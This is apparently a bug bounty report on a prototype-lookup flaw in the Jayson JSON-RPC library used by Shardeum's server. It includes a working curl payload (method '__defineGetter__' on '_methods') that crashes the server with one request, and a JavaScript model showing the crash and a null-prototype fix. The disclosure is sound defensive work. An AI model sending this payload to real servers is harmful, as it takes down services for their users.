# Boost \_ Shardeum\_ Ancillaries 33577 - \[Websites and Applications - Insight] Taking down the HTTP ser

Submitted on Tue Jul 23 2024 19:52:16 GMT-0400 (Atlantic Standard Time) by @anton\_quantish for [Boost | Shardeum: Ancillaries](https://immunefi.com/bounty/shardeum-ancillaries-boost/)

Report ID: #33577

Report type: Websites and Applications

Report severity: Insight

Target: <https://github.com/shardeum/json-rpc-server/tree/dev>

Impacts:

* Taking down the application/website

## Description

## Brief/Intro

After finding <https://bugs.immunefi.com/dashboard/submission/33571> I started to play around with the same code of your HTTP server, which is built on Jayson, and accidentally found a similar 0-day vulnerability there. It requires just a single request to completely take down the application.

## Vulnerability Details

The vulnerability works in a very similar way. When you create the Jayson server instance, you pass the methods into the constructor:

```js
const server = new jayson.Server(methods)
```

They are then parsed and stored in the `server._methods` map. When a request arrives, the server first resolves the requested method as follows:

```
Server.prototype.getMethod = function(name) {
  return this._methods[name];
};
```

and then invokes it, passing the request params as arguments:

```js
handler.call(server, ...args);
```

As far as I understand, such a call is equivalent to

```js
server[method](...args);
```

Because `_methods` is a plain object, a lookup for a name that is not a registered method falls through to `Object.prototype`, so a request whose `method` is `__defineGetter__` resolves to `Object.prototype.__defineGetter__`, and the call above invokes it with the server instance as `this` and the request params as arguments. This way, we can override some server fields using the same `__defineGetter__` function. I tried to override the `_methods` field itself and completely broke the server (see the PoC).

## Impact Details

Complete HTTP server take down.

## Proof of concept

## Proof of Concept

1. Start the JSON-RPC server
2. Send the following request with cURL:

```sh
curl http://172.16.205.128:8080 -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"__defineGetter__","params":["_methods"],"id":1}'
```

3. Send any valid request, for instance:

```sh
curl http://172.16.205.128:8080 -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"eth_gasPrice","params":[],"id":1}'
```

4. Observe that the following traceback is returned and also appears in the server logs. The `Server._methods` frame is the getter installed by the first request: every subsequent read of `server._methods` now invokes that request's response callback, which attempts to write to a response whose headers have already been sent:

```
Error [ERR_HTTP_HEADERS_SENT]: Cannot set headers after they are sent to the client
    at new NodeError (node:internal/errors:399:5)
    at ServerResponse.setHeader (node:_http_outgoing:645:11)
    at ServerResponse.writeHead (node:_http_server:378:21)
    at /home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/middleware.js:51:15
    at Utils.JSON.stringify (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/utils.js:290:3)
    at /home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/middleware.js:39:18
    at callback (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:241:22)
    at respond (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:292:9)
    at Server._methods (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:329:7)
    at Server.getMethod (/home/quantish/shardeum/json-rpc-server/node_modules/jayson/lib/server/index.js:190:15)
```

I think other impacts are also possible here, but I didn't dive deeper. RCE couldn't be achieved though, I think.

## Mitigation

Since this is a 0-day vulnerability in a third-party library, I think you have the following options:

* report this issue to the vendor and wait for the fix to be implemented (I can assist you with that if you want me to);
* use some other JSON-RPC server library.
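
The lookup quoted in Vulnerability Details and the library-level fix that the options above leave to the vendor can be illustrated together. What follows is an added example written for this page, not code from Jayson or from the Shardeum json-rpc-server: a small dispatcher that models the lookup the report quotes (a plain-object `_methods` table, `this._methods[name]`, then `handler.call(server, ...args)`) and replays the PoC against it, followed by the same dispatcher with a null-prototype method table and an own-property check. The `hasMethod` check using `in`, the `eth_gasPrice` stub, the `reply` stand-in for the HTTP response and the error messages are the model's own assumptions, not Jayson internals.

```javascript
'use strict';

// Added example (not Jayson's or Shardeum's code): a minimal JSON-RPC dispatcher
// modelled on the lookup the report describes (a plain-object `_methods` table,
// `this._methods[name]`, then `handler.call(server, ...args)`), first as written
// and then hardened. `reply` stands in for the HTTP response object; replying
// twice on it throws, which is the model's equivalent of ERR_HTTP_HEADERS_SENT.

function makeReply() {
  let sent = null;
  const reply = (msg) => {
    if (sent !== null) throw new Error('headers already sent');
    sent = msg;
  };
  reply.sent = () => sent;
  return reply;
}

// Constructed stand-in for the real method table (assumption, not the project's methods).
const METHODS = {
  eth_gasPrice(callback) { callback(null, '0x3b9aca00'); },
};

class Dispatcher {
  constructor(table) { this._methods = table; }
  // `in` walks the prototype chain, so with a plain-object table
  // '__defineGetter__' counts as a known method.
  hasMethod(name) { return name in this._methods; }
  getMethod(name) { return this._methods[name]; }

  handle(req, reply) {
    const respond = (error, result) =>
      reply(error ? { jsonrpc: '2.0', id: req.id, error }
                  : { jsonrpc: '2.0', id: req.id, result: result === undefined ? null : result });
    try {
      if (!this.hasMethod(req.method)) {
        return respond({ code: -32601, message: 'Method not found' });
      }
      const handler = this.getMethod(req.method);
      const args = Array.isArray(req.params) ? req.params.slice() : [];
      args.push((err, result) =>
        respond(err ? { code: -32000, message: String(err) } : null, result));
      // With method "__defineGetter__" and params ["_methods"] this is
      // server.__defineGetter__("_methods", callback): from now on every read
      // of server._methods invokes this request's response callback.
      handler.call(this, ...args);
    } catch (e) {
      respond({ code: -32603, message: e.message });
    }
  }
}

// Vulnerable shape: the method table is a plain object literal.
function plainServer(methods) {
  return new Dispatcher(Object.assign({}, methods));
}

// Hardened shape: null-prototype table plus an own-property, function-valued check.
class HardenedDispatcher extends Dispatcher {
  constructor(methods) {
    const table = Object.create(null);
    for (const [name, fn] of Object.entries(methods)) table[name] = fn;
    super(table);
  }
  hasMethod(name) {
    return Object.prototype.hasOwnProperty.call(this._methods, name)
      && typeof this._methods[name] === 'function';
  }
}

// Replays the report's PoC: poison `_methods`, then send ordinary requests.
// Returns what each request's reply received (null = no reply was written).
function runPoC(server) {
  const requests = [
    { jsonrpc: '2.0', method: '__defineGetter__', params: ['_methods'], id: 1 },
    { jsonrpc: '2.0', method: 'eth_gasPrice', params: [], id: 2 },
    { jsonrpc: '2.0', method: 'eth_gasPrice', params: [], id: 3 },
  ];
  return requests.map((req) => {
    const reply = makeReply();
    server.handle(req, reply);
    return reply.sent();
  });
}

console.log('plain   :', JSON.stringify(runPoC(plainServer(METHODS))));
console.log('hardened:', JSON.stringify(runPoC(new HardenedDispatcher(METHODS))));
```

Against the plain table the poisoning request gets no reply at all (the handler never calls its callback), the next request fails while resolving `eth_gasPrice` because the getter has replaced `_methods`, and every request after that hits the double write on the first request's response, which is the model's version of the `ERR_HTTP_HEADERS_SENT` traceback above. With the null-prototype table and the own-property check, an unregistered name can no longer resolve to anything inherited from `Object.prototype`, so `__defineGetter__`, `__defineSetter__`, `__proto__`, `constructor` and the rest are rejected as unknown methods and the server keeps serving. That is the shape of fix to ask the vendor for, or to apply locally if you wrap the library's method table yourself.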

